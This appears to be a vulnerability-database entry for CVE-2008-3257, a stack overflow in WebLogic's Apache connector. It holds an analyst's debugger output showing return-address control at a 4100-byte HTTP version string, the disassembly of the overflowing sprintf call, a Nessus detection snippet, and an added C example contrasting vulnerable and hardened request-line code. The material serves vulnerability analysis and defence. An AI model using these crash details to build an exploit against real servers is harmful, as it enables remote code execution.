Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
Recent assessments:
wchen-r7 at September 12, 2019 6:07pm UTC reported:
Bea Weblogic 8.1 + Apache
<http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html>
First crash
(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0 ov up ei pl nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416 add byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
More controlled crash: length 4100
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
mod_wl detection via Nessus
weblogic_mod_wl_overflow.nasl: "TITLE>Weblogic Bridge Message" >< res[2] ||
POST /index.jsp HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
<BODY>
<h2>Failure of server APACHE bridge:</h2><p>
<hr><pre>Internal Server failure, APACHE plugin. Cannot continue.</pre>
<hr><br><b>Build date/time:</b> <i>Jun 16 2006 15:14:11</i>
<p><hr><b>Change Number:</b> <i>779586</i>
</BODY>
</HTML>
mod_wl overflow
.text:1000E751 push ecx ; it should be HTTP/1.1 but.... failed :)
.text:1000E752 push edx
.text:1000E753 mov edx, [ebp+214h]
.text:1000E759 push edx
.text:1000E75A push offset aSSS ; "%s %s %s\r\n"
.text:1000E75F push eax ; Dest
.text:1000E760 call ds:sprintf ; here is where overflow happens!
GET EIP on RET
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000 add esp,101Ch
0:244> db esp
0440c7b8 1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00 ............J...
0440c7c8 48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e Host: 192.168.1.
0440c7d8 31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a 130..User-Agent:
0440c7e8 20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f Mozilla/4.0 (co
0440c7f8 6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36 mpatible; MSIE 6
0440c808 2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35 .0; Windows NT 5
0440c818 2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70 .1)..Content-Typ
0440c828 65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78 e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3 ret
0:244> db esp
0440d7d4 41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08 AAAAAAAA........
0440d7e4 09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a ................
0440d7f4 1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a ..... !"#$%&'()*
0440d804 2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a +,-./0123456789:
0440d814 3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b ;<=>@ABCDEFGHIJK
0440d824 4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b LMNOPQRSTUVWXYZ[
0440d834 5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b \]^_`abcdefghijk
0440d844 6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
41414141 ?? ???
<http://www.securityfocus.com/bid/30273/info>
Assessed Attacker Value: 0
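The pattern behind the crash, as an added example that is not code from this page, from wchen-r7, or from Oracle/BEA: the plugin rebuilds the request line with sprintf("%s %s %s\r\n") into a fixed-size stack buffer (the call at .text:1000E760 in the assessment above), so a long HTTP version string runs off the end of that buffer and overwrites the saved return address. The C below puts that vulnerable shape beside a hardened one that enforces the HTTP-version grammar and bounds the write. The buffer size MAX_REQ_LINE, the function names, and the "POST /index.jsp" inputs are assumptions for illustration; 4096 is not the plugin's actual buffer size, which the page does not give.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the plugin's stack buffer; the real value is not on the page. */
#define MAX_REQ_LINE 4096

/* Strict HTTP-version grammar: "HTTP/" DIGIT "." DIGIT and nothing after it.
 * Anything longer, such as a run of 'A's after "HTTP/1.1", is rejected. */
static int valid_http_version(const char *v)
{
    if (strlen(v) != 8 || memcmp(v, "HTTP/", 5) != 0)
        return 0;
    if (!isdigit((unsigned char)v[5]) || v[6] != '.' || !isdigit((unsigned char)v[7]))
        return 0;
    return 1;
}

/* Bytes that "%s %s %s\r\n" needs, excluding the terminating NUL. */
static size_t request_line_len(const char *method, const char *uri, const char *version)
{
    return strlen(method) + 1 + strlen(uri) + 1 + strlen(version) + 2;
}

/* Vulnerable shape: the caller hands in a fixed-size stack buffer and the
 * combined length of the three strings is never compared against it. */
static void build_request_line_vuln(char *dst, const char *method,
                                    const char *uri, const char *version)
{
    sprintf(dst, "%s %s %s\r\n", method, uri, version);   /* unbounded write */
}

/* Hardened shape: validate the version first, bound the write, and treat a
 * truncated result as an error instead of forwarding it to the backend.
 * Returns the line length on success, -1 on rejection. */
static int build_request_line_safe(char *dst, size_t dstlen, const char *method,
                                   const char *uri, const char *version)
{
    if (dstlen == 0 || !valid_http_version(version))
        return -1;
    int n = snprintf(dst, dstlen, "%s %s %s\r\n", method, uri, version);
    if (n < 0 || (size_t)n >= dstlen) {   /* would not fit: refuse, leave nothing behind */
        dst[0] = '\0';
        return -1;
    }
    return n;
}

/* Returns 1 when the safe builder reproduces the constructed benign request line. */
static int demo_benign(void)
{
    char buf[MAX_REQ_LINE];
    int n = build_request_line_safe(buf, sizeof buf, "POST", "/index.jsp", "HTTP/1.1");
    return n == 26 && strcmp(buf, "POST /index.jsp HTTP/1.1\r\n") == 0;
}

/* Returns 1 when an n-byte version string (the assessment used 4100 bytes) both
 * exceeds MAX_REQ_LINE in the vulnerable form and is rejected by the safe form.
 * The vulnerable builder is deliberately not called with this input. */
static int demo_overlong(size_t n)
{
    char buf[MAX_REQ_LINE];
    char *version = malloc(n + 1);
    if (!version)
        return 0;
    memset(version, 'A', n);
    version[n] = '\0';
    int overflows = request_line_len("POST", "/index.jsp", version) + 1 > MAX_REQ_LINE;
    int rejected = build_request_line_safe(buf, sizeof buf, "POST", "/index.jsp", version) == -1;
    free(version);
    return overflows && rejected;
}

/* Returns 1 when a well-formed version but an n-byte URI is caught by the
 * snprintf bound check rather than by the version grammar. */
static int demo_long_uri(size_t n)
{
    char buf[MAX_REQ_LINE];
    char *uri = malloc(n + 2);
    if (!uri)
        return 0;
    uri[0] = '/';
    memset(uri + 1, 'A', n);
    uri[n + 1] = '\0';
    int rc = build_request_line_safe(buf, sizeof buf, "POST", uri, "HTTP/1.1");
    free(uri);
    return rc == -1 && buf[0] == '\0';
}

int main(void)
{
    char buf[MAX_REQ_LINE];
    build_request_line_vuln(buf, "POST", "/index.jsp", "HTTP/1.1");  /* safe only because the input is short */
    printf("vulnerable form, benign input: %s", buf);
    printf("safe form, benign input reproduced: %d\n", demo_benign());
    printf("4100-byte version overflows vuln form and is rejected by safe form: %d\n",
           demo_overlong(4100));
    printf("5000-byte URI rejected by bound check: %d\n", demo_long_uri(5000));
    return 0;
}
```

Compile with any C99 compiler and run. The hardened builder rejects the 4100-byte version on the grammar check before it ever touches the buffer, and the long-URI case shows why the snprintf return value has to be checked as well: truncation would silently forward a malformed request line to the backend, so the builder errors out instead.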
blogs.oracle.com/security/2008/07/security_alert_for_cve-2008-3257_released.html
secunia.com/advisories/31146
www.attrition.org/pipermail/vim/2008-July/002035.html
www.attrition.org/pipermail/vim/2008-July/002036.html
www.kb.cert.org/vuls/id/716387
www.oracle.com/technology/deploy/security/alerts/alert_cve2008-3257.html
www.securityfocus.com/bid/30273
www.securitytracker.com/id?1020520
www.vupen.com/english/advisories/2008/2145/references
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257
exchange.xforce.ibmcloud.com/vulnerabilities/43885
www.exploit-db.com/exploits/6089